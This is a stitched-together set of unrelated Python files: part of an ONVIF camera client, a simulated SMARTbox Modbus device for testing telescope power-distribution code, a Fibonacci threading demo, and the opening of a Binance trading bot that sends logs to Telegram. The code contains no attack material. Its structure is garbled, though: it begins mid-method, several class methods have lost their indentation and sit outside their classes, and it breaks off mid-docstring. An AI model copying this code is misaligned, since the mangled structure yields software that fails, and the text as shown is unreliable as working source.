service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name, portType=None):
    """Return (xaddr, wsdl path, binding name) for the named service.

    :param name: service key within the SERVICES dictionary
    :param portType: optional port-type suffix appended to the namespace
    :raises ONVIFError: unknown service, missing WSDL file, or a service
        the connected device does not advertise
    """
    if name not in SERVICES:
        raise ONVIFError('Unknown service %s' % name)
    meta = SERVICES[name]
    ns = meta['ns']
    # Binding name uses the base namespace, BEFORE any portType suffix.
    binding_name = '{%s}%s' % (ns, meta['binding'])
    if portType:
        ns += '/' + portType
    wsdlpath = os.path.join(self.wsdl_dir, meta['wsdl'])
    if not os.path.isfile(wsdlpath):
        raise ONVIFError('No such file: %s' % wsdlpath)
    if name == 'devicemgmt':
        # XAddr for devicemgmt is fixed at /onvif/device_service.
        prefix = self.host
        if not (prefix.startswith('http://') or prefix.startswith('https://')):
            prefix = 'http://%s' % self.host
        xaddr = '%s:%s/onvif/device_service' % (prefix, self.port)
        return xaddr, wsdlpath, binding_name
    # Every other service uses the XAddr discovered in update_xaddrs().
    xaddr = self.xaddrs.get(ns)
    if not xaddr:
        raise ONVIFError("Device doesn't support service: %s" % name)
    return xaddr, wsdlpath, binding_name
def create_onvif_service(self, name, portType=None, transport=None):
    """
    Create an ONVIF service client and cache it on this camera.

    (Fix: the method previously had a second, dead docstring-expression
    after the real one; the two have been merged.)

    :param name: service name, should be present as a key within
        the `SERVICES` dictionary declared within the `onvif.definition` module
    :param portType: optional WSDL port-type suffix for the namespace
    :param transport: optional zeep transport; defaults to self.transport
    :return: the newly created ONVIFService instance
    """
    name = name.lower()
    xaddr, wsdl_file, binding_name = self.get_definition(name, portType)
    with self.services_lock:
        if not transport:
            transport = self.transport
        service = ONVIFService(xaddr, self.user, self.passwd,
                               wsdl_file, self.encrypt,
                               self.daemon, no_cache=self.no_cache,
                               dt_diff=self.dt_diff,
                               binding_name=binding_name,
                               transport=transport)
        # Cache under both the dict and an attribute (enables camera.media etc.).
        self.services[name] = service
        setattr(self, name, service)
        # NOTE(review): services_template is a class attribute, so this write
        # is visible to every ONVIFCamera instance in the process.
        if not self.services_template.get(name):
            self.services_template[name] = service
    return service
# --- Per-service factory helpers --------------------------------------------
# Thin wrappers around create_onvif_service(); each builds (and caches) the
# client for one ONVIF service. `transport` optionally overrides self.transport.
def create_devicemgmt_service(self, transport=None):
    # The entry point for devicemgmt service is fixed (see get_definition).
    return self.create_onvif_service('devicemgmt', transport=transport)

def create_media_service(self, transport=None):
    return self.create_onvif_service('media', transport=transport)

def create_ptz_service(self, transport=None):
    return self.create_onvif_service('ptz', transport=transport)

def create_imaging_service(self, transport=None):
    return self.create_onvif_service('imaging', transport=transport)

def create_deviceio_service(self, transport=None):
    return self.create_onvif_service('deviceio', transport=transport)

def create_events_service(self, transport=None):
    return self.create_onvif_service('events', transport=transport)

def create_analytics_service(self, transport=None):
    return self.create_onvif_service('analytics', transport=transport)

def create_recording_service(self, transport=None):
    return self.create_onvif_service('recording', transport=transport)

def create_search_service(self, transport=None):
    return self.create_onvif_service('search', transport=transport)

def create_replay_service(self, transport=None):
    return self.create_onvif_service('replay', transport=transport)

def create_pullpoint_service(self, transport=None):
    # PullPoint subscriptions live under the events namespace with an
    # extra portType suffix.
    return self.create_onvif_service('pullpoint',
                                     portType='PullPointSubscription',
                                     transport=transport)

def create_receiver_service(self, transport=None):
    return self.create_onvif_service('receiver', transport=transport)

def create_notification_service(self, transport=None):
    return self.create_onvif_service('notification', transport=transport)

def create_subscription_service(self, transport=None):
    return self.create_onvif_service('subscription', transport=transport)
|
sim_smartbox.py | #!/usr/bin/env python
"""
Simulates a SMARTbox, acting as a Modbus slave and responding to 0x03, 0x06 and 0x10 Modbus commands
to read and write registers. Used for testing PaSD code.
"""
import logging
import random
import threading
import time
logging.basicConfig()
from pasd import smartbox
# Default strength of the pull back towards the mean in random_walk()
# (dimensionless, must be < 1.0).
RETURN_BIAS = 0.005

# %-format template used by SimSMARTbox.__str__ to render the box state.
STATUS_STRING = """\
Simulated SMARTBox at address: %(modbus_address)s:
ModBUS register revision: %(mbrv)s
PCB revision: %(pcbrv)s
CPU ID: %(cpuid)s
CHIP ID: %(chipid)s
Firmware revision: %(firmware_version)s
Uptime: %(uptime)s seconds
R.Address: %(station_value)s
48V In: %(incoming_voltage)4.2f V (%(incoming_voltage_state)s)
5V out: %(psu_voltage)4.2f V (%(psu_voltage_state)s)
PSU Temp: %(psu_temp)4.2f deg C (%(psu_temp_state)s)
PCB Temp: %(pcb_temp)4.2f deg C (%(pcb_temp_state)s)
Outside Temp: %(outside_temp)4.2f deg C (%(outside_temp_state)s)
Status: %(statuscode)s (%(status)s)
Service LED: %(service_led)s
Indicator: %(indicator_code)s (%(indicator_state)s)
Initialised: %(initialised)s
Online: %(online)s
"""


def random_walk(current_value, mean, scale=1.0, return_bias=RETURN_BIAS):
    """
    Generate the next sample of a simulated sensor: a random walk around
    *mean* with a bias pulling the value back towards the mean.
    With scale=1.0, typical variation over 1000 samples is roughly +/- 2.0.

    :param current_value: Current sensor value, arbitrary units
    :param mean: Desired mean value
    :param scale: Scale factor - scale=1.0 means random jumps of -1% to +1% of the mean per step
    :param return_bias: Dimensionless factor, must be < 1.0. Lower values increase long-term variation
    :return: Next value for the sensor reading
    """
    # Random jump of up to +/- (scale)% of the mean per iteration.
    jump = mean * scale * ((random.random() - 0.5) * 0.02)
    # Pull back towards the mean proportional to the current offset.
    pull = return_bias * (mean - current_value)
    return current_value + jump + pull
class SimSMARTbox(smartbox.SMARTbox):
    """
    An instance of this class simulates a single SMARTbox, acting as a Modbus slave and responding to 0x03, 0x06 and
    0x10 Modbus commands to read and write registers.

    Run sim_loop() to start the simulation; it spawns listen_loop() in a
    separate thread to service incoming Modbus packets while the main loop
    updates the simulated sensor values and box state.
    """
def __init__(self, conn=None, modbus_address=None, logger=None):
    """
    Create a simulated SMARTbox.

    :param conn: transport connection used for Modbus communications
    :param modbus_address: Modbus station address this simulated box answers to
    :param logger: optional logging.Logger instance
    """
    # Inherited from the controller code in pasd/smartbox.py
    smartbox.SMARTbox.__init__(self, conn=conn, modbus_address=modbus_address, logger=logger)
    self.mbrv = 1  # Modbus register-map revision number for this physical SMARTbox
    self.pcbrv = 1  # PCB revision number for this physical SMARTbox
    self.register_map = smartbox.SMARTBOX_REGISTERS[1]  # Assume register map version 1
    self.sensor_temps = {i:33.33 for i in range(1, 13)}  # Dictionary with sensor number (1-12) as key, and temperature as value
    self.cpuid = 1  # CPU identifier (integer)
    self.chipid = bytes([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])  # Unique ID number (16 bytes), different for every physical SMARTbox
    self.firmware_version = 1  # Firmware revision number for this physical SMARTbox
    self.uptime = 0  # Time in seconds since this SMARTbox was powered up
    self.station_value = modbus_address  # Modbus address read back from the SYS_ADDRESS register - should always equal modbus_address
    self.incoming_voltage = 46.9  # Measured voltage for the (nominal) 48VDC input power (Volts)
    self.psu_voltage = 5.1  # Measured output voltage for the internal (nominal) 5V power supply
    self.psu_temp = 28.0  # Temperature of the internal 5V power supply (deg C)
    self.pcb_temp = 27.0  # Temperature on the internal PCB (deg C)
    self.outside_temp = 24.0  # Outside temperature (deg C)
    self.statuscode = smartbox.STATUS_UNINITIALISED  # Status value, one of the smartbox.STATUS_* globals, and used as a key for smartbox.STATUS_CODES (eg 0 meaning 'OK')
    self.status = 'UNINITIALISED'  # Status string, obtained from smartbox.STATUS_CODES global (eg 'OK')
    self.service_led = False  # True if the blue service indicator LED is switched ON.
    self.indicator_code = smartbox.LED_GREENFAST  # LED status value, one of the smartbox.LED_* globals, and used as a key for smartbox.LED_CODES
    self.indicator_state = 'GREENFAST'  # LED status string, obtained from smartbox.LED_CODES
    self.readtime = 0  # Unix timestamp for the last successful polled data from this SMARTbox
    self.pdoc_number = None  # Physical PDoC port on the FNDH that this SMARTbox is plugged into. Populated by the station initialisation code on powerup
    # Only in the smartbox simulator class
    self.start_time = time.time()  # Unix timestamp when this instance started processing
    self.initialised = False  # True if the system has been initialised by the LMC
    self.online = False  # Will be True if we've heard from the MCCS in the last 300 seconds.
    self.shortpress = False  # Set to True to simulate a short button press (cleared when it's handled)
    self.mediumpress = False  # Set to True to simulate a medium button press (cleared when it's handled)
    self.longpress = False  # Set to True to simulate a long button press (never cleared)
    self.wants_exit = False  # Set to True externally to kill self.mainloop if the box is pseudo-powered-off
    # Sensor states, with four thresholds for hysteresis (alarm high, warning high, warning low, alarm low).
    # Each has three possible values (OK, WARNING or RECOVERY).
    self.sensor_states = {regname:'UNINITIALISED' for regname in self.register_map['CONF'] if not regname.endswith('_CURRENT_TH')}
    # Port current states, with only one (high) threshold, and fault handling internally. Can only be OK or ALARM.
    self.portcurrent_states = {regname:'OK' for regname in self.register_map['CONF'] if regname.endswith('_CURRENT_TH')}
def __str__(self):
    """Human-readable summary of the simulated box state, plus all 12 ports."""
    state = self.__dict__.copy()
    # Expose the per-sensor threshold states under the names that the
    # STATUS_STRING template expects.
    for key, regname in (('incoming_voltage_state', 'SYS_48V_V_TH'),
                         ('psu_voltage_state', 'SYS_PSU_V_TH'),
                         ('psu_temp_state', 'SYS_PSUTEMP_TH'),
                         ('pcb_temp_state', 'SYS_PCBTEMP_TH'),
                         ('outside_temp_state', 'SYS_OUTTEMP_TH')):
        state[key] = self.sensor_states[regname]
    portlines = "\n".join([str(self.ports[pnum]) for pnum in range(1, 13)])
    return STATUS_STRING % (state) + "\nPorts:\n" + portlines
# The controller-side SMARTbox class polls and configures real hardware; in
# the simulator those operations are meaningless, so they are stubbed out.
def poll_data(self):
    """
    Stub, not needed for simulated SMARTbox.
    """
    pass

def read_uptime(self):
    """
    Stub, not needed for simulated SMARTbox.
    """
    pass

def write_thresholds(self):
    """
    Stub, not needed for simulated SMARTbox.
    """
    pass

def write_portconfig(self):
    """
    Stub, not needed for simulated SMARTbox.
    """
    pass

def configure(self, thresholds=None, portconfig=None):
    """
    Stub, not needed for simulated SMARTbox.
    """
    pass

def loophook(self):
    """
    Stub, overwrite if you subclass this to handle more complex simulation. Called every time a packet has
    finished processing, or every few seconds if there haven't been any packets.
    Don't do anything that takes a long time in here - this is called in the packet handler thread.
    :return: None
    """
    pass
def listen_loop(self):
    """
    Listen on the socket for any incoming read/write register packets sent by an external bus master (eg, the MCCS).
    The transport.Connection.listen_for_packet() method exits after the first valid packet processed, to allow
    the calling code to handle side-effects from register read/write operations (for example, multiple reads from
    the same register block returning different values). This code loops forever, and each time, it:
    1) Sets up the slave_registers dictionary with the current box state.
    2) Calls self.conn.listen_for_packet(), which returns all of the register numbers read or written by a packet
       (if one was processed in that call). If no packets are received, it will return at the specified maxtime.
    3) Uses the list of written registers to update the box state, and update the 'heard from MCCS' timestamp.
    4) If any registers are in the 'read' list, update the 'heard from MCCS' timestamp.
    Note that we traverse around the loop whenever we process an incoming packet, or when waiting for a packet
    times out after around a second.
    :return: None
    """
    while not self.wants_exit:  # Process packets until we are told to die
        # Set up the registers for the physical->smartbox/port mapping:
        slave_registers = {}
        self.uptime = int(time.time() - self.start_time)  # Set the current uptime value
        # Copy the local simulated instance data to the temporary registers dictionary - first the POLL registers
        for regname in self.register_map['POLL']:
            regnum, numreg, regdesc, scalefunc = self.register_map['POLL'][regname]
            if regname == 'SYS_MBRV':
                slave_registers[regnum] = self.mbrv
            elif regname == 'SYS_PCBREV':
                slave_registers[regnum] = self.pcbrv
            elif regname == 'SYS_CPUID':
                slave_registers[regnum], slave_registers[regnum + 1] = divmod(self.cpuid, 65536)
            elif regname == 'SYS_CHIPID':
                for i in range(numreg):
                    # Bug fix: register i must hold bytes 2i and 2i+1 of the
                    # 16-byte chip ID (big-endian pairs). The old 'i // 2'
                    # indexing repeated the early bytes and never exposed the
                    # second half of the ID.
                    slave_registers[regnum + i] = self.chipid[2 * i] * 256 + self.chipid[2 * i + 1]
            elif regname == 'SYS_FIRMVER':
                slave_registers[regnum] = self.firmware_version
            elif regname == 'SYS_UPTIME':
                slave_registers[regnum], slave_registers[regnum + 1] = divmod(self.uptime, 65536)
            elif regname == 'SYS_ADDRESS':
                slave_registers[regnum] = self.station_value
            elif regname == 'SYS_48V_V':
                slave_registers[regnum] = scalefunc(self.incoming_voltage, reverse=True, pcb_version=self.pcbrv)
            elif regname == 'SYS_PSU_V':
                slave_registers[regnum] = scalefunc(self.psu_voltage, reverse=True, pcb_version=self.pcbrv)
            elif regname == 'SYS_PSUTEMP':
                slave_registers[regnum] = scalefunc(self.psu_temp, reverse=True, pcb_version=self.pcbrv)
            elif regname == 'SYS_PCBTEMP':
                slave_registers[regnum] = scalefunc(self.pcb_temp, reverse=True, pcb_version=self.pcbrv)
            elif regname == 'SYS_OUTTEMP':
                slave_registers[regnum] = scalefunc(self.outside_temp, reverse=True, pcb_version=self.pcbrv)
            elif regname == 'SYS_STATUS':
                slave_registers[regnum] = self.statuscode
            elif regname == 'SYS_LIGHTS':
                # MSB = service LED on/off, LSB = indicator LED code.
                slave_registers[regnum] = int(self.service_led) * 256 + self.indicator_code
            elif (regname[:9] == 'SYS_SENSE'):
                sensor_num = int(regname[9:])
                slave_registers[regnum] = scalefunc(self.sensor_temps[sensor_num], reverse=True, pcb_version=self.pcbrv)
            elif (len(regname) >= 8) and ((regname[0] + regname[-6:]) == 'P_STATE'):
                # Pnn_STATE bitmap registers, one per port.
                pnum = int(regname[1:-6])
                slave_registers[regnum] = self.ports[pnum].status_to_integer(write_state=True, write_to=True)
            elif (len(regname) >= 10) and ((regname[0] + regname[-8:]) == 'P_CURRENT'):
                # Pnn_CURRENT raw current-reading registers, one per port.
                pnum = int(regname[1:-8])
                slave_registers[regnum] = self.ports[pnum].current_raw
        # Now copy the configuration (threshold) data to the temporary register dictionary
        for regname in self.register_map['CONF']:
            regnum, numreg, regdesc, scalefunc = self.register_map['CONF'][regname]
            if numreg == 1:
                slave_registers[regnum] = scalefunc(self.thresholds[regname], pcb_version=self.pcbrv, reverse=True)
            elif numreg == 4:
                (slave_registers[regnum],
                 slave_registers[regnum + 1],
                 slave_registers[regnum + 2],
                 slave_registers[regnum + 3]) = (scalefunc(x, pcb_version=self.pcbrv, reverse=True) for x in self.thresholds[regname])
            else:
                self.logger.critical('Unexpected number of registers for %s' % regname)
        # Wait up to one second for an incoming packet. On return, we get a set of registers numbers that were
        # read by that packet, and a set of register numbers that were written to by that packet. The
        # temporary slave_registers dictionary has new values for each register in the written_set.
        try:
            read_set, written_set = self.conn.listen_for_packet(listen_address=self.modbus_address,
                                                                slave_registers=slave_registers,
                                                                maxtime=1,
                                                                validation_function=None)
        except Exception:
            # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit
            # can still terminate the thread; transport errors are logged
            # and the loop retries after a short pause.
            self.logger.exception('Exception in transport.listen_for_packet():')
            time.sleep(1)
            continue
        if read_set or written_set:  # The MCCS has talked to us, update the self.readtime timestamp
            self.readtime = time.time()
        # If any registers have been written to, update the local instance attributes from the new values
        if written_set:
            self.handle_register_writes(slave_registers, written_set)
        # Update the on/off state of all the ports, based on local instance attributes
        goodcodes = [smartbox.STATUS_OK, smartbox.STATUS_WARNING]
        if (self.statuscode not in goodcodes):  # If we're not OK or WARNING disable all the outputs
            for port in self.ports.values():
                port.status_timestamp = time.time()
                port.current_timestamp = port.status_timestamp
                port.system_level_enabled = False
                port.power_state = False
        else:  # Otherwise, set the output state based on online/offline status and the four desired_state bits
            for port in self.ports.values():
                port.status_timestamp = time.time()
                port.current_timestamp = port.status_timestamp
                port.system_level_enabled = True
                port_on = False
                port.current_raw = 0
                port.current = 0.0
                if ( ( (self.online and port.desire_enabled_online)
                       or ((not self.online) and port.desire_enabled_offline)
                       or (port.locally_forced_on) )
                     and (not port.locally_forced_off) ):
                    port_on = True
                    port.current_raw = 2048
                    port.current = 2048.0
                port.power_state = port_on
        self.loophook()
    self.logger.info('Ending listen_loop() in SimSMARTbox')
def handle_register_writes(self, slave_registers, written_set):
    """
    Take the modified temporary slave_registers dictionary, and the set of register numbers that were modified by
    the packet, and update the local instance attributes.
    Note that writes to many registers are ignored by the SMARTbox, as the data is read-only, so this function
    only needs to handle changes to registers that are R/W.
    :param slave_registers: Dictionary, with register number as the key and register contents as the value
    :param written_set: A set() of register numbers that were modified by the most recent packet.
    :return: None
    """
    # First handle the port state bitmap registers (P01_STATE .. P12_STATE,
    # assumed contiguous in the register map).
    for regnum in range(self.register_map['POLL']['P01_STATE'][0], self.register_map['POLL']['P12_STATE'][0] + 1):
        if regnum in written_set:
            port = self.ports[(regnum - self.register_map['POLL']['P01_STATE'][0]) + 1]
            status_bitmap = slave_registers[regnum]
            # Render as a 16-char bit string so individual flag pairs can be
            # sliced out by position (bit 0 = MSB).
            bitstring = "{:016b}".format(status_bitmap)
            # Desired state online - R/W, write 00 if no change to current value
            if (bitstring[2:4] == '10'):
                port.desire_enabled_online = False
            elif (bitstring[2:4] == '11'):
                port.desire_enabled_online = True
            elif (bitstring[2:4] == '00'):
                pass
            else:
                self.logger.warning('Unknown desire enabled online flag: %s' % bitstring[2:4])
                port.desire_enabled_online = None
            # Desired state offline - R/W, write 00 if no change to current value
            if (bitstring[4:6] == '10'):
                port.desire_enabled_offline = False
            elif (bitstring[4:6] == '11'):
                port.desire_enabled_offline = True
            elif (bitstring[4:6] == '00'):
                pass
            else:
                self.logger.warning('Unknown desired state offline flag: %s' % bitstring[4:6])
                port.desire_enabled_offline = None
            # Technician override - R/W, write 00 if no change to current value
            if (bitstring[6:8] == '10'):
                port.locally_forced_on = False
                port.locally_forced_off = True
            elif (bitstring[6:8] == '11'):
                port.locally_forced_on = True
                port.locally_forced_off = False
            elif (bitstring[6:8] == '01'):
                port.locally_forced_on = False
                port.locally_forced_off = False
            else:
                pass
            if bitstring[8] == '1':  # Reset breaker if 1, ignore if 0
                port.breaker_tripped = False
    # Now update any new threshold data from the configuration registers.
    for regname in self.register_map['CONF']:
        regnum, numreg, regdesc, scalefunc = self.register_map['CONF'][regname]
        if regnum in written_set:
            if numreg == 1:
                self.thresholds[regname] = scalefunc(slave_registers[regnum], pcb_version=self.pcbrv)
            else:
                # Four-register thresholds: (alarm high, warning high, warning low, alarm low)
                self.thresholds[regname] = [scalefunc(slave_registers[x], pcb_version=self.pcbrv) for x in range(regnum, regnum + 4)]
    # Now update the service LED state (data in the LSB is ignored, because the microcontroller handles the
    # status LED).
    if self.register_map['POLL']['SYS_LIGHTS'][0] in written_set:  # Wrote to SYS_LIGHTS, so set light attributes
        msb, lsb = divmod(slave_registers[self.register_map['POLL']['SYS_LIGHTS'][0]], 256)
        self.service_led = bool(msb)
    if self.register_map['POLL']['SYS_STATUS'][0] in written_set:  # Wrote to SYS_STATUS, so clear UNINITIALISED state
        self.initialised = True
def sim_loop(self):
    """
    Runs continuously, simulating hardware processes independent of the communications packet handler.
    Starts the Modbus communications handler (receiving and processing packets) in a different thread, so simulation
    actions don't hold up packet handling.
    :return: None
    """
    random.seed()  # Ensure different random walks for sensors in each smartbox thread
    self.start_time = time.time()
    self.logger.info('Started comms thread for SMARTbox')
    listen_thread = threading.Thread(target=self.listen_loop, daemon=False, name=threading.current_thread().name + '-C')
    listen_thread.start()
    self.statuscode = smartbox.STATUS_UNINITIALISED
    self.status = 'UNINITIALISED'
    self.indicator_code = smartbox.LED_YELLOWFAST  # Fast flash yellow - uninitialised
    self.indicator_state = 'YELLOWFAST'
    self.logger.info('Started simulation loop for SMARTbox')
    while not self.wants_exit:  # Process packets until we are told to die
        self.uptime = int(time.time() - self.start_time)  # Set the current uptime value
        # Update the online/offline state, depending on how long it's been since the MCCS last sent a packet to us
        # Note that the port powerup/powerdown as a result of online/offline transitions is handled in the listen_loop
        if (time.time() - self.readtime >= 300) and self.online:  # More than 5 minutes since we heard from MCCS, go offline
            self.online = False
            for port in self.ports.values():
                port.system_online = False
        elif (time.time() - self.readtime < 300) and (not self.online):  # Less than 5 minutes since we heard from MCCS, go online
            self.online = True
            for port in self.ports.values():
                port.system_online = True
        time.sleep(0.5)
        # Change the sensor values to generate a random walk around a mean value for each sensor
        self.incoming_voltage = random_walk(self.incoming_voltage, mean=46.1, scale=0.5)
        self.psu_voltage = random_walk(self.psu_voltage, mean=5.1, scale=0.05)
        self.psu_temp = random_walk(self.psu_temp, mean=28.3, scale=0.5)
        self.pcb_temp = random_walk(self.pcb_temp, mean=27.0, scale=0.5)
        self.outside_temp = random_walk(self.outside_temp, mean=24.0, scale=0.5)
        if self.initialised:  # Don't bother thresholding sensor values until the thresholds have been set
            # For each threshold register, get the current value and threshold/s from the right local instance attribute
            for regname in self.register_map['CONF']:
                if regname.endswith('_CURRENT_TH'):
                    curstate = self.portcurrent_states[regname]
                    ah = self.thresholds[regname]
                    wh, wl, al = ah, -1, -2  # Only one threshold for port current, hysteresis handled in firmware
                    curvalue = self.ports[int(regname[1:3])].current
                else:
                    curstate = self.sensor_states[regname]
                    ah, wh, wl, al = self.thresholds[regname]
                    if regname == 'SYS_48V_V_TH':
                        curvalue = self.incoming_voltage
                    elif regname == 'SYS_PSU_V_TH':
                        curvalue = self.psu_voltage
                    elif regname == 'SYS_PSUTEMP_TH':
                        curvalue = self.psu_temp
                    elif regname == 'SYS_PCBTEMP_TH':
                        curvalue = self.pcb_temp
                    elif regname == 'SYS_OUTTEMP_TH':
                        curvalue = self.outside_temp
                    elif regname.startswith('SYS_SENSE'):
                        curvalue = self.sensor_temps[int(regname[9:11])]
                    else:
                        # Bug fix: the '%s' placeholder was never filled in --
                        # the register name was missing from the log message.
                        self.logger.critical('Configuration register %s not handled by simulation code' % regname)
                        return
                # Now use the current value and threshold/s to find the new state for that sensor
                newstate = curstate
                if curvalue > ah:
                    newstate = 'ALARM'
                elif wh < curvalue <= ah:
                    if curstate == 'ALARM':
                        newstate = 'RECOVERY'
                    elif curstate != 'RECOVERY':
                        newstate = 'WARNING'
                elif wl <= curvalue <= wh:
                    newstate = 'OK'
                elif al <= curvalue < wl:
                    if curstate == 'ALARM':
                        newstate = 'RECOVERY'
                    elif curstate != 'RECOVERY':
                        newstate = 'WARNING'
                elif curvalue < al:
                    newstate = 'ALARM'
                # Log any change in state
                if curstate != newstate:
                    msg = 'Sensor %s transitioned from %s to %s with reading of %4.2f and thresholds of %3.1f,%3.1f,%3.1f,%3.1f'
                    self.logger.warning(msg % (regname[:-3],
                                               curstate,
                                               newstate,
                                               curvalue,
                                               ah,wh,wl,al))
                # Record the new state for that sensor in a dictionary with all sensor states
                if regname.endswith('_CURRENT_TH'):
                    self.portcurrent_states[regname] = newstate
                else:
                    self.sensor_states[regname] = newstate
        if self.shortpress:  # Unhandled short button press - reset any faults and technician overrides, try again
            self.logger.info('Short button press detected.')
            # Change any 'RECOVERY' sensor states to WARNING
            for regname, value in self.portcurrent_states.items():
                if value == 'RECOVERY':
                    self.portcurrent_states[regname] = 'WARNING'
            for regname, value in self.sensor_states.items():
                if value == 'RECOVERY':
                    self.sensor_states[regname] = 'WARNING'
            # Clear any port locally_forced_* bits
            # And reset any tripped software breakers
            for p in self.ports.values():
                p.locally_forced_on = False
                p.locally_forced_off = False
                p.breaker_tripped = False
            self.shortpress = False  # Handled, so clear the flag
        if self.mediumpress:
            self.logger.info('Medium button press detected.')
            # Force all the FEM ports off
            for p in self.ports.values():
                p.locally_forced_on = False
                p.locally_forced_off = True
            self.mediumpress = False
        if self.longpress:
            if self.statuscode != smartbox.STATUS_POWERDOWN:
                self.logger.info('Long button press detected.')  # Only log this once, not every loop
                # Ask for a shutdown
                # Force all the FEM ports off
                for p in self.ports.values():
                    p.locally_forced_on = False
                    p.locally_forced_off = True
                self.statuscode = smartbox.STATUS_POWERDOWN
                self.indicator_code = smartbox.LED_GREENRED
                self.indicator_state = 'GREENRED'
            # While longpress is held (it is never cleared), skip the
            # overall-state recomputation so POWERDOWN sticks.
            continue
        # Now update the overall box state, based on all of the sensor states
        if self.initialised:
            if 'ALARM' in self.sensor_states.values():  # If any sensor is in ALARM, so is the whole box
                self.statuscode = smartbox.STATUS_ALARM
                if self.online:
                    self.indicator_code = smartbox.LED_REDSLOW
                else:
                    self.indicator_code = smartbox.LED_RED
            elif 'RECOVERY' in self.sensor_states.values():  # Otherwise, if any sensor is RECOVERY, so is the whole box
                self.statuscode = smartbox.STATUS_RECOVERY
                if self.online:
                    self.indicator_code = smartbox.LED_YELLOWREDSLOW
                else:
                    self.indicator_code = smartbox.LED_YELLOWRED
            elif 'WARNING' in self.sensor_states.values():  # Otherwise, if any sensor is WARNING, so is the whole box
                self.statuscode = smartbox.STATUS_WARNING
                if self.online:
                    self.indicator_code = smartbox.LED_YELLOWSLOW
                else:
                    self.indicator_code = smartbox.LED_YELLOW
            else:
                self.statuscode = smartbox.STATUS_OK  # If all sensors are OK, so is the whole box
                if self.online:
                    self.indicator_code = smartbox.LED_GREENSLOW
                else:
                    self.indicator_code = smartbox.LED_GREEN
        else:
            self.statuscode = smartbox.STATUS_UNINITIALISED
            self.indicator_code = smartbox.LED_YELLOWFAST  # Fast flash yellow - uninitialised
        self.status = smartbox.STATUS_CODES[self.statuscode]
        self.indicator_state = smartbox.LED_CODES[self.indicator_code]
    self.logger.info('Ending sim_loop() in SimSMARTbox')
"""
Use as 'simulate.py smartbox', or:
from pasd import transport
from simulate import sim_smartbox
conn = transport.Connection(hostname='134.7.50.185') # address of ethernet-serial bridge
# or
conn = transport.Connection(devicename='/dev/ttyS0') # or 'COM5' for example, under Windows
s = sim_smartbox.SimSMARTbox(conn=conn, modbus_address=1)
s.sim_loop()
"""
|
20a.py | ## fib.py
def fib(n):
    """Naive doubly-recursive Fibonacci: deliberately CPU-bound, O(phi**n)."""
    if n < 2:
        return n
    else:
        return fib(n-1) + fib(n-2)

# Sequential baseline: run the heavy workload twice on one thread.
fib(35)
fib(35)
print("Done")
## fib_parallel.py
from threading import Thread

def fib(n):
    # Redefinition: this file concatenates two standalone demo scripts.
    if n < 2:
        return n
    else:
        return fib(n-1) + fib(n-2)

# Threaded variant: under CPython's GIL, CPU-bound threads cannot execute
# bytecode in parallel, so this demonstrates threading overhead, not speedup.
# NOTE(review): the threads compute fib(5) while the sequential baseline used
# fib(35) -- confirm whether that mismatch is intentional.
t1 = Thread(target=fib, args=(5, ))
t1.start()
t2 = Thread(target=fib, args=(5, ))
t2.start()
t1.join()
t2.join()
print("Done")
trader.py | #!/usr/bin/env python3
import ccxt
from configparser import ConfigParser
import json
import os
import redis
import socket
import threading
import time
from random import randint
from requests_futures.sessions import FuturesSession
# Tuning constants.
CRON_TIME = 15   # NOTE(review): unused in this excerpt -- presumably the cron interval in minutes; confirm
PANIC_COUNT = 5  # Maximum retry depth for buy()/sell() before giving up

# Identification strings used in Telegram log messages.
BOT_NAME = 'Trader'
HOST_NAME = socket.gethostname()

# config.ini lives next to this script.
CONFIG_FILE = '{}/config.ini'.format(os.path.dirname(os.path.abspath(__file__)))
config = ConfigParser()
config.read(CONFIG_FILE)

# Fire-and-forget HTTP session, used for Telegram notifications in log().
session = FuturesSession()

# Shared state store for last prices and running totals.
rd = redis.StrictRedis(host=config['REDIS']['HOST'],
                       port=config['REDIS']['PORT'],
                       password=config['REDIS']['PASS'], db=0)

# Exchange client used for all market data and order placement.
exchange = ccxt.binance({'apiKey': config['BINANCE']['KEY'],
                         'secret': config['BINANCE']['SECRET']})
class Symbol(object):
    """Attribute-style view over a JSON-serialisable mapping.

    The JSON round-trip deep-copies *obj* and normalises it to plain
    dicts/lists, so each top-level key becomes an instance attribute.
    """
    def __init__(self, obj):
        plain = json.loads(json.dumps(obj))
        self.__dict__ = plain
def log(text):
    """Print a timestamped message and push it to Telegram (fire-and-forget)."""
    message = '{} {} {} {}'.format(time.strftime("%d/%m/%Y %H:%M"), HOST_NAME, BOT_NAME, text)
    url = ('https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}&parse_mode=markdown'
           .format(config['TELEGRAM']['BOT'], config['TELEGRAM']['CHAT'], message))
    # FuturesSession.get() is asynchronous; the response is intentionally ignored.
    session.get(url)
    print(message)
def add(key, value):
    """Accumulate *value* onto the float total stored under *key* in Redis.

    A missing key counts as zero.
    """
    stored = rd.get(key)
    current = 0.0 if stored is None else float(stored)
    rd.set(key, current + value)
def save_buy_total(algo, symbol, amount, buy_price):
    """Record the buy price and roll the spend (plus 0.5% fee) into Redis totals."""
    cost = amount * buy_price
    rd.set('{}_buy'.format(symbol.symbol), buy_price)
    add('buy_total', cost)
    add('{}_buy_total'.format(algo), cost)
    add('fee_total', cost * 0.005)
def save_sell_total(algo, symbol, amount, sell_price):
    """Record the sell price and roll the proceeds (plus 0.5% fee) into Redis totals."""
    proceeds = amount * sell_price
    rd.set('{}_sell'.format(symbol.symbol), sell_price)
    add('sell_total', proceeds)
    add('{}_sell_total'.format(algo), proceeds)
    add('fee_total', proceeds * 0.005)
def get_buy_price(symbol):
    """Return the last recorded buy price for *symbol*, or 0 when none is stored."""
    raw = rd.get('{}_buy'.format(symbol.symbol))
    return 0 if raw is None else float(raw)
def buy_bnb():
    """Top up the BNB balance Binance uses to pay trading fees.

    Buys roughly the exchange's minimum order cost worth of BNB whenever
    the free BNB balance has fallen below that amount.
    """
    symbol = 'BNB/{}'.format(config['CONFIG']['QUOTE'])
    last_price = exchange.fetch_ticker(symbol)['last']
    # Minimum order cost the exchange allows for this market.
    min_cost = exchange.market(symbol)['limits']['cost']['min']
    amount = int(min_cost / last_price)
    if exchange.fetch_balance()['free']['BNB'] < amount:
        exchange.create_market_buy_order(symbol, amount)
        log('buy BNB for fee, amount: %g' % amount)
def price_calculate(symbol):
    """Derive limit buy/sell prices just inside the current spread.

